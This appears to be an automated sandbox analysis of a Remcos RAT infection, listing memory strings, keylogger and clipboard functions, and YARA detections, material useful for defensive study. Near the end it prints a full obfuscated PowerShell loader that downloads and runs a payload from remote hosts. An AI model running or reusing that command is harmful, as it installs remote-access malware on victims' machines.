Source: svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000E.00000003.1364645984.0000029365832000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000E.00000003.1364350143.0000029365861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365450419.000002936582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000E.00000003.1363885308.0000029365835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 0000000E.00000002.1365450419.000002936582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364138584.000002936586A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365747346.000002936586B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: edb.log.13.dr, qmgr.db.13.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000000D.00000003.1204066669.0000021A94D60000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000003.00000003.1041475614.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038845850.0000000005BF0000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.dr	String found in binary or memory: https://github.com/koswald/VBScript
Source: wscript.exe, 00000003.00000003.1039285589.00000000059DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039002518.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1040953290.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038755780.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038966575.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039048879.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041831687.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041475614.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.dr	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
Source: wscript.exe, 00000003.00000003.1039002518.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038755780.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038966575.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039048879.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041475614.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsG
Source: wscript.exe, 00000003.00000003.1039285589.00000000059BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039285589.00000000059DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039002518.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1040953290.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038755780.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1043182015.00000000059B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038966575.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045637073.00000000059BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039048879.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041831687.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041475614.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.dr	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
Source: powershell.exe, 00000005.00000002.1078641425.00000000057E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041232593.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: recover.exe, 00000009.00000002.1150976955.0000000003198000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000002.1151189070.0000000003539000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000003.1150494750.0000000003539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: recover.exe, 00000009.00000002.1150976955.0000000003198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: recover.exe, 00000009.00000002.1150976955.0000000003198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: recover.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000003.00000002.1044412866.0000000002ABA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041666626.0000000002AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041729244.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041599868.0000000002A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000003.00000002.1044412866.0000000002ABA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041666626.0000000002AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041729244.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041599868.0000000002A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/c
Source: wscript.exe, 00000003.00000002.1044310929.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1043888883.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045927535.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1044588740.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041232593.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1042586627.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041599868.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1044214581.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041706954.0000000002A89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/c30NOIBR/0
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041232593.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/c30NOIBR/0/
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000E.00000003.1364686741.000002936583E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000E.00000003.1364686741.000002936583E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000E.00000003.1363885308.0000029365835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000E.00000002.1365450419.000002936582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: recover.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443

Source: unknown

HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49692 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000

8_2_00409D1E

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Jump to behavior

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

8_2_0040B158

Contains functionality to modify clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	8_2_0041696E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	9_2_00409E39
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	9_2_00409EA1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	10_2_00406DFC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	10_2_00406E9F
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	11_2_004068B5
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	11_2_004072B5

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

8_2_0040B158

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

8_2_00409E4A

Yara detected Keylogger Generic

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jasgbtisot.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041CF2D SystemParametersInfoW,

8_2_0041CF2D

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ